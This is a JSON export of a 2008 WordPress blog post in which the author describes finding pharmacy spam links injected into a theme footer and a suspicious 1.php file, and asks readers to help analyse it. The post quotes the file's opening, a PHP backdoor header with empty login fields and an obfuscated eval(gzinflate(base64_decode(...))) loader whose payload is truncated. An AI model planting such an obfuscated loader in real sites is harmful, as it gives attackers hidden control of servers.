{"id":2325,"date":"2008-09-19T15:11:25","date_gmt":"2008-09-19T22:11:25","guid":{"rendered":"http:\/\/lee.org\/blog\/?p=2325"},"modified":"2017-09-23T07:30:37","modified_gmt":"2017-09-23T14:30:37","slug":"my-blog-hacked-for-spam","status":"publish","type":"post","link":"https:\/\/www.lee.org\/blog\/2008\/09\/19\/my-blog-hacked-for-spam\/","title":{"rendered":"My Blog Hacked for Spam"},"content":{"rendered":"<p>Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php.  \u00a0All the links forward to \u00a0<a href=\"http:\/\/canadian-meds-shop.com.NOSPAM\">canadian-meds-shop.com<\/a>. These are bad people: \u00a0scammers and thieves.<\/p>\n<p>I also found a strange file in my wordpress theme file, 1.php. The file started like this:<\/p>\n<blockquote><p>&lt;?PHP<br \/>\n \u00a0 \u00a0  \u00a0  \u00a0  \u00a0  \u00a0  \u00a0 \/\/Authentication<br \/>\n$login = &#8220;&#8221;; \/\/Login<br \/>\n$pass = &#8220;&#8221;;  \u00a0\/\/Pass<br \/>\n$md5_pass = &#8220;&#8221;; \/\/If no pass then hash<br \/>\neval(gzinflate(base64_decode(&#8216;HJ3HkqNQEkU\/ZzqCBd4t8V4YAQI2E3jvPV8\/1Gw6orsVFLyXefMcFUL5EXf\/yqceii7e8n9JvOYE9t8sT8cs\/\/<\/p><\/blockquote>\n<p>I don&#8217;t know how this file got there or what it does but I&#8217;m pretty sure it&#8217;s bad stuff.<\/p>\n<p>Do you want to try and figure out what this evil f&#8217;ing spam program does? \u00a0<a href=\"http:\/\/lee.org\/blog\/wp-content\/uploads\/2008\/09\/1.zip\">Here is the virus file. Caution! This is a bad program!<\/a> (update: I removed the virus. It&#8217;s a bother that it keeps tripping my antivirus software.)<\/p>\n<p>Tell me what you find out, would you?<\/p>\n<p>Now I&#8217;ve got to figure out how they got on my system&#8230;. grrrrrr.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php. \u00a0All the links forward to \u00a0canadian-meds-shop.com. These are bad people: \u00a0scammers and thieves. I also found a strange file in my wordpress theme file, 1.php. The file started like this: &lt;?PHP \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-2325","post","type-post","status-publish","format-standard","hentry","category-geekery"],"_links":{"self":[{"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/posts\/2325","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/comments?post=2325"}],"version-history":[{"count":0,"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/posts\/2325\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/media?parent=2325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/categories?post=2325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lee.org\/blog\/wp-json\/wp\/v2\/tags?post=2325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}